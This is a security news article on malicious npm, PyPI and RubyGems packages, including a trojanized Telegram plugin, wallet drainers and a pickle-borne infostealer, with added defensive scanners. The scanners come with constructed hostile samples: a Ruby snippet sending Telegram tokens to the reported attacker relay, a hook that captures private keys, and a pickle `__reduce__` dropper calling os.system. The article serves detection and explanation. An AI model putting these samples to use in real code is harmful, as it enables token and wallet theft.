Malicious PyPI, npm and Ruby Packages exposed in an ongoing open source supply chain attack

June 8, 2025
Several malicious packages have been discovered across the npm, PyPI and RubyGems repositories, illustrating the variety of supply chain threats that continue to lurk in the open source ecosystem: draining cryptocurrency wallets, wiping an entire codebase after installation, and stealing Telegram API tokens.

The findings come from multiple reports published by Checkmarx, ReversingLabs, Safety, and Socket. A summary of the packages identified across these reports was presented as an image:

[Figure: Malicious PyPI, npm, and Ruby packages]

Socket noted that two malicious gems were published by threat actors under the aliases BùiNam, Buidanhnam and Si_Mobile, days after Vietnam ordered a nationwide ban on the Telegram messaging app late last month.

“These gems quietly exfiltrate all data sent to the Telegram API by redirecting traffic through a command and control (C2) server controlled by the threat actors,” says Socket researcher Kirill Boychenko. “This includes bot tokens, chat IDs, message content and attachments.”

The software supply chain security company said the gems are a “nearly identical clone” of the legitimate fastlane plugin “fastlane-plugin-telegram”, a library widely used to send deployment notifications from CI/CD pipelines to Telegram channels.

The malicious changes effectively turn the dependency into a man-in-the-middle between the victim and the Telegram API: the network endpoint used to send and receive Telegram messages is redirected to a hard-coded attacker server (“rough-breeze-0c37.buidanhnam95.workers(.)dev”), which harvests the sensitive data passing through it.

Given that the malware itself is not region-specific and lacks any geofencing logic to restrict its execution to Vietnamese systems, it is suspected that the attackers simply exploited the state’s Telegram ban to distribute the forged libraries under the guise of a proxy.

“This campaign shows how quickly threat actors can leverage geopolitical events to launch targeted supply chain attacks,” Boychenko said. “By weaponizing widely used development tools such as fastlane and disguising credential-stealing capabilities behind a timely ‘proxy’ feature, they exploited the trust in the package ecosystem that permeates CI/CD environments.”
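A clone that keeps the plugin's interface and only swaps the base URL is easy to miss in code review but trivial to catch mechanically: the genuine notifier has exactly one reason to make a network request, and that is the Telegram Bot API. The script below is an added example, not code from Socket or from the fastlane project. It pulls every URL and quoted hostname out of a dependency's source and reports any host outside an expected allowlist. The two Ruby snippets are constructed sketches of a benign and a trojanized notifier (not the real gem sources); the relay host in the second one is the one the article reports, written defanged, and the scanner refangs before matching because that is how indicators usually arrive.

```python
import re
from urllib.parse import urlparse

# Hosts the genuine telegram notifier has any business contacting.
# This allowlist is an assumption for the example; derive it from the upstream project.
EXPECTED_HOSTS = {"api.telegram.org"}

URL_RE = re.compile(r"""https?://[^\s"'`<>)]+""")
# A quoted bare hostname such as "example.workers.dev" (no scheme, no path).
HOST_RE = re.compile(
    r"""["']([a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)+)["']""",
    re.I,
)


def refang(text: str) -> str:
    """Undo the usual defanging so (.) and [.] hosts are compared as real hosts."""
    return text.replace("(.)", ".").replace("[.]", ".").replace("hxxp", "http")


def extract_hosts(source: str) -> set:
    """Every host the source could reach: from full URLs and from quoted bare hostnames."""
    source = refang(source)
    hosts = set()
    for url in URL_RE.findall(source):
        host = urlparse(url).hostname
        if host:
            hosts.add(host.lower())
    for host in HOST_RE.findall(source):
        # Drop version-like strings ("1.2.3"): a real TLD is alphabetic.
        if host.rsplit(".", 1)[-1].isalpha():
            hosts.add(host.lower())
    return hosts


def unexpected_hosts(source: str, expected=EXPECTED_HOSTS) -> set:
    """Hosts the dependency talks to that the upstream project never did: review each one."""
    return {h for h in extract_hosts(source) if h not in expected}


# Constructed sketch of a legitimate notifier: talks only to the Telegram Bot API.
BENIGN_GEM_SOURCE = '''
require "net/http"
module Fastlane
  module Helper
    def self.send_message(token, chat_id, text)
      uri = URI("https://api.telegram.org/bot#{token}/sendMessage")
      Net::HTTP.post_form(uri, "chat_id" => chat_id, "text" => text)
    end
  end
end
'''

# Constructed sketch of the trojanized variant: same interface, but the base URL is
# an attacker-controlled relay (the host Socket reported, defanged as in the article).
TROJANIZED_GEM_SOURCE = '''
require "net/http"
module Fastlane
  module Helper
    PROXY = "https://rough-breeze-0c37.buidanhnam95.workers(.)dev"
    def self.send_message(token, chat_id, text)
      uri = URI("#{PROXY}/bot#{token}/sendMessage")
      Net::HTTP.post_form(uri, "chat_id" => chat_id, "text" => text)
    end
  end
end
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_GEM_SOURCE), ("trojanized", TROJANIZED_GEM_SOURCE)):
        print(label, "->", unexpected_hosts(src) or "no unexpected hosts")
```

Run it over the unpacked gem (or `node_modules`, or a wheel) before the dependency is allowed into the pipeline, and treat any hit on a `workers.dev`, `ngrok`, or similar throwaway host as a block, not a warning. The check is deliberately dumb: it will not see hosts assembled at runtime from fragments or decoded from Base64, so a clean result is a triage signal, not a verdict.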

Socket also discovered an npm package called “xlsx-to-json-lh” that typosquats the legitimate conversion tool “xlsx-to-json-lc”, causing unsuspecting developers to trigger a malicious payload when they import the package. It was first published in February 2019 and has since been removed.

“This package contains a hidden payload that establishes a persistent connection to a command and control (C2) server,” said security researcher Kush Pandya. “When triggered, it can delete the entire project directory without warning or any recovery option.”

Specifically, the destructive action is unlocked when the C2 server issues the French command “remise à zéro” (meaning “reset”), at which point the package deletes source code files, version control data, configuration files, node_modules (including itself), and all other project assets.

Another set of malicious npm packages, pancake_uniswap_validators_utils_snipe, pancakeswap-oracle-rendiction, ethereum-smart-contract, and env-process, has been found to siphon 80-85% of incoming funds from victims’ Ethereum or BSC wallets using attacker-controlled code.

The packages were uploaded by a user named @crypto-exploit; pancake_uniswap_validators_utils_snipe, published four years ago, attracted over 2,100 downloads. They are no longer available for download.

A similar cryptocurrency-themed malicious package discovered on PyPI has built-in covert functionality to steal Solana private keys, source code and other sensitive data from compromised systems. It is worth noting that “semantic type” was benign when first uploaded on December 22, 2024; the malicious payload was introduced in an update on January 26, 2025.

The PyPI package is designed to “monkey patch” the Solana key generation method, modifying the associated function at runtime without changing the original source code.

The threat actors, who published the Python packages to the repository under the alias capperships, are said to have used polished README files to lend the packages credibility and linked them to a GitHub repository to lure users into downloading them.

“Every time a key pair is generated, the malware captures the private key,” Boychenko said. “It then encrypts the key using a hard-coded RSA-2048 public key and encodes the result in Base64. The encrypted key is embedded in an SPL Memo transaction and sent to Solana Devnet, where the threat actor can retrieve and decrypt it to gain full access to the stolen wallet.”
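The runtime patch described above is invisible to the caller: the wrapped generator still returns a valid key pair, so nothing breaks and nothing in the SDK's own source changed. The block below is an added example, not the campaign's code and not the Solana library. It uses a constructed stand-in module with a toy `generate_keypair` (random bytes, not Ed25519), installs a hook the way such a package would at import time (using `functools.wraps`, which defeats naive `__name__` checks), and then shows the audit a defender can run: compare a function's bytecode fingerprint against a baseline recorded from a trusted install, and look for the artifacts a wrapper cannot hide. The real campaign RSA-2048-encrypts the key before encoding it; that step is omitted here since the standard library has no RSA, and the captured keys are only appended to a local list in place of the Devnet memo channel.

```python
import base64
import functools
import hashlib
import os
import types


def _make_sdk_stub() -> types.ModuleType:
    """Constructed stand-in for a wallet SDK module. Not the real Solana library;
    the key pair is random bytes plus a hash, not a real Ed25519 key."""
    sdk = types.ModuleType("wallet_sdk_stub")

    def generate_keypair():
        secret = os.urandom(32)
        public = hashlib.sha256(secret).digest()  # toy derivation, illustration only
        return secret, public

    sdk.generate_keypair = generate_keypair
    return sdk


CAPTURED = []  # where the hook drops stolen keys (stands in for the exfiltration channel)


def install_hook(sdk: types.ModuleType) -> None:
    """What a malicious package does at import time: swap the generator for a wrapper
    that hands the caller a normal key pair and quietly records the secret."""
    original = sdk.generate_keypair

    @functools.wraps(original)  # copies __name__/__qualname__/__doc__, so a name check passes
    def patched():
        secret, public = original()
        CAPTURED.append(base64.b64encode(secret).decode())  # real campaign: RSA-2048 first
        return secret, public

    sdk.generate_keypair = patched


def fingerprint(fn) -> str:
    """Hash of the bytecode, constants and referenced names. Record this from a
    trusted install (for example in CI) and compare at runtime."""
    code = fn.__code__
    h = hashlib.sha256(code.co_code)
    h.update(repr(code.co_consts).encode())
    h.update(repr(code.co_names).encode())
    return h.hexdigest()


def audit(fn, baseline: str) -> list:
    """Findings that indicate fn is no longer the function that was shipped."""
    findings = []
    if fingerprint(fn) != baseline:
        findings.append("bytecode differs from trusted baseline")
    if hasattr(fn, "__wrapped__"):
        findings.append("carries __wrapped__: wrapped at runtime via functools.wraps")
    if fn.__closure__:
        findings.append("closes over outer variables: likely a wrapper holding the original")
    if fn.__code__.co_name != fn.__name__:
        findings.append("__name__ was copied onto a differently named code object")
    return findings


def demo() -> dict:
    sdk = _make_sdk_stub()
    baseline = fingerprint(sdk.generate_keypair)          # captured while the SDK is clean
    clean_findings = audit(sdk.generate_keypair, baseline)
    install_hook(sdk)                                     # the malicious import happens
    secret, _public = sdk.generate_keypair()              # victim sees an ordinary key pair
    leaked = base64.b64decode(CAPTURED[-1]) == secret     # ...while the secret was captured
    return {
        "clean_findings": clean_findings,
        "after_hook": audit(sdk.generate_keypair, baseline),
        "leaked": leaked,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The fingerprint comparison is the check that matters; the other three are cheap corroboration that a careful attacker can avoid (a wrapper written in C, or one that rebuilds the code object, leaves no closure and no `__wrapped__`). Baselines must come from an install you trust, which in practice means pinned, hash-verified dependencies and a build that is not allowed to fetch packages it has not seen before.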

According to Vancouver-based Safety, a second batch of 11 Python packages targeting the Solana ecosystem was uploaded to PyPI between May 4 and May 24, 2025. The packages are designed to steal Python script files from developers’ systems and send them to an external server. One of the identified packages, “solana-live”, which claims to be a price-fetching library, has also been observed exfiltrating Jupyter notebooks.

In a sign that typosquatting continues to be a critical attack vector, Checkmarx has flagged six malicious PyPI packages impersonating Colorama, a widely used Python package for coloring terminal output, and Colorizr, a color conversion JavaScript library available on npm.

“The tactic of using names from one ecosystem (npm) to attack users of a different ecosystem (PyPI) is unusual,” the company said. “The payloads allow for persistent remote access to and remote control of desktops and servers, as well as the harvesting and exfiltration of sensitive data.”

What’s noteworthy about the campaign is that it targets users on both Windows and Linux: the malware can establish a connection to the C2 server, exfiltrate sensitive environment variables and configuration information, and take steps to bypass endpoint security controls.

That said, it is not currently known whether the Linux and Windows payloads are the work of the same attacker, which raises the possibility that they are separate campaigns abusing similar typosquatting tactics.
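Both the xlsx-to-json-lh case above and the Colorama/Colorizr case here come down to names that are one edit away from, or borrowed wholesale from, a package developers already trust. The block below is an added example, not tooling from Socket or Checkmarx. It applies two checks to a dependency manifest before installation: an edit-distance comparison against well-known names in the same registry (catching `xlsx-to-json-lh` against `xlsx-to-json-lc`), and a cross-ecosystem lookup that flags a PyPI requirement whose name is a well-known npm package (the Colorizr pattern). The "well-known" lists are constructed from the names in this article; real tooling would seed them from each registry's top downloads. Names are normalized per PEP 503 before comparison so that `Colorama`, `colorama` and `COLORAMA` are treated as the same project.

```python
import re

# Constructed lists of trusted names per ecosystem, seeded from this article.
# Real tooling would pull the top-N packages of each registry. Assumption for the example.
POPULAR = {
    "npm": {"xlsx-to-json-lc", "colorizr"},
    "pypi": {"colorama"},
    "rubygems": {"fastlane-plugin-telegram"},
}


def normalize(name: str) -> str:
    """PEP 503 name normalization (PyPI); harmless for npm and RubyGems names too."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance (insert/delete/substitute), row-by-row to keep memory small."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check(name: str, ecosystem: str, max_distance: int = 2) -> list:
    """Findings for one requested package; an empty list means nothing suspicious."""
    n = normalize(name)
    popular_here = {normalize(p) for p in POPULAR[ecosystem]}
    if n in popular_here:
        return []  # exact match to a trusted name in its own registry
    findings = []
    for p in sorted(popular_here):
        d = levenshtein(n, p)
        if d <= max_distance:
            findings.append(f"typosquat? {name!r} is {d} edit(s) from {p!r} on {ecosystem}")
    for other, names in POPULAR.items():
        if other != ecosystem and n in {normalize(p) for p in names}:
            findings.append(
                f"cross-ecosystem: {name!r} is a well-known {other} package, not a {ecosystem} one"
            )
    return findings


def audit_manifest(requirements: dict) -> dict:
    """requirements: {ecosystem: [names]} -> {name: findings} for every suspicious entry."""
    report = {}
    for ecosystem, names in requirements.items():
        for name in names:
            findings = check(name, ecosystem)
            if findings:
                report[name] = findings
    return report


if __name__ == "__main__":
    # Constructed manifest: one typosquat, one cross-ecosystem impersonation, one clean entry.
    sample = {"npm": ["xlsx-to-json-lh"], "pypi": ["colorizr", "Colorama"]}
    for name, findings in audit_manifest(sample).items():
        print(name)
        for f in findings:
            print("  -", f)
```

Two edits is a deliberately loose threshold for short names (it would flag many legitimate forks of three-letter packages), so in practice scale `max_distance` with name length and exempt names already present in a lockfile that has been reviewed. The cross-ecosystem check is the cheap one that Checkmarx's note says attackers are now counting on nobody running.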

Malicious actors have also wasted no time capitalizing on the growing popularity of artificial intelligence (AI) tools, poisoning the software supply chain with PyPI packages such as aliyun-ai-labs-snippets-sdk, ai-labs-snippets-sdk, and aliyun-ai-labs-sdk.

The malicious packages were published on PyPI on May 19, 2025 and were available for less than 24 hours. Even so, the three packages were collectively downloaded over 1,700 times before being pulled from the registry.

“Once installed, the malicious packages deliver an infostealer payload hidden within a PyTorch model loaded from the initialization script,” said Karlo Zanki, a researcher at ReversingLabs. “The malicious payload exfiltrates basic information about the infected machine and the contents of the .gitconfig file.”

The malicious code embedded within the model collects details about the logged-in user, the network address of the infected machine, the name of the organization to which the machine belongs, and the contents of the .gitconfig file.

Interestingly, the organization name is obtained by reading the “_utmc_lui_” settings key from the configuration of the AliMeeting online meeting application, a popular video conferencing application in China. This suggests that the campaign’s likely targets are developers in China.

Furthermore, this attack highlights the growing threat posed by the misuse of machine learning model formats such as Pickle, which execute arbitrary code when a model is loaded.

“Threat actors are constantly trying to evade security tools and find new ways to hide malicious payloads from security analysts,” says Zanki. “This time they used ML models. This is a new approach to distributing malware through the PyPI platform, and a clever one, since security tools are only beginning to implement support for detecting malicious functionality within ML models.”
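The reason a PyTorch model can carry an infostealer at all is that the default `.pt`/`.pth` format is a Pickle stream, and Pickle is not a data format but a small stack machine: a `GLOBAL` or `STACK_GLOBAL` opcode imports any importable name, and `REDUCE` calls it with attacker-chosen arguments the moment the file is loaded. The block below is an added example, not ReversingLabs' tooling and not the campaign's payload. It uses `pickletools.genops` to walk the opcode stream without ever unpickling, lists every global the file would import, and flags any outside an allowlist of modules a legitimate state_dict references. The two sample files are constructed in the block itself: a benign `OrderedDict` of weights, and the same dict with one value whose `__reduce__` points at `os.system` (the command is a harmless `echo`, and the trojanized bytes are never loaded). The allowlist is an assumption for the example; tune it per framework.

```python
import os
import pickle
import pickletools
from collections import OrderedDict

# Modules a serialized PyTorch state_dict legitimately references.
# Assumption for this example: tune per framework and per model source.
ALLOWED_MODULES = ("torch", "collections", "numpy", "_codecs")

_STRING_OPCODES = {"STRING", "BINSTRING", "SHORT_BINSTRING",
                   "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def find_globals(data: bytes) -> list:
    """Every module.name the pickle would import when loaded, read from the opcode
    stream with pickletools. Nothing is unpickled, so nothing executes."""
    found, recent_strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in _STRING_OPCODES:
            recent_strings.append(arg)
        elif opcode.name in ("GLOBAL", "INST"):          # protocol <= 3: arg is "module name"
            module, name = arg.split(" ", 1)
            found.append(f"{module}.{name}")
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:   # protocol 4+
            found.append(f"{recent_strings[-2]}.{recent_strings[-1]}")
    return found


def _allowed(module: str) -> bool:
    return any(module == a or module.startswith(a + ".") for a in ALLOWED_MODULES)


def scan_pickle(data: bytes) -> list:
    """Globals outside the allowlist. Each one is a callable the loader would hand to
    REDUCE/NEWOBJ the moment torch.load or pickle.load touches the file."""
    return [g for g in find_globals(data) if not _allowed(g.rsplit(".", 1)[0])]


class _Dropper:
    """Stand-in for the object a trojanized model smuggles in: on load, pickle calls
    os.system with the embedded command. Constructed for the example; never loaded here."""

    def __reduce__(self):
        return (os.system, ("echo payload-would-run-here",))


def build_benign_state_dict(protocol: int) -> bytes:
    """Constructed sample: what a plain state_dict looks like on disk."""
    return pickle.dumps(OrderedDict([("layer.weight", [0.1, 0.2])]), protocol=protocol)


def build_trojanized_state_dict(protocol: int) -> bytes:
    """Constructed sample: same weights plus one poisoned entry. Do not pickle.load this."""
    weights = OrderedDict([("layer.weight", [0.1, 0.2])])
    weights["_"] = _Dropper()
    return pickle.dumps(weights, protocol=protocol)


if __name__ == "__main__":
    for label, builder in (("benign", build_benign_state_dict),
                           ("trojanized", build_trojanized_state_dict)):
        for proto in (2, 4):
            data = builder(proto)
            print(f"{label} (protocol {proto}): globals={find_globals(data)} "
                  f"flagged={scan_pickle(data)}")
```

Two caveats a practitioner should carry with this. First, an allowlist scan is triage, not proof: an attacker can reach a dangerous callable through an attribute of an allowed module, or hide the pickle inside a zip member or a nested `BINBYTES` blob, so a clean result only means the obvious opcodes are absent. Second, the loader-side control is to refuse arbitrary globals altogether: `torch.load(path, weights_only=True)` restricts the unpickler to tensor and primitive types, and safer formats such as safetensors avoid Pickle entirely for weights that never needed executable code in the first place.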
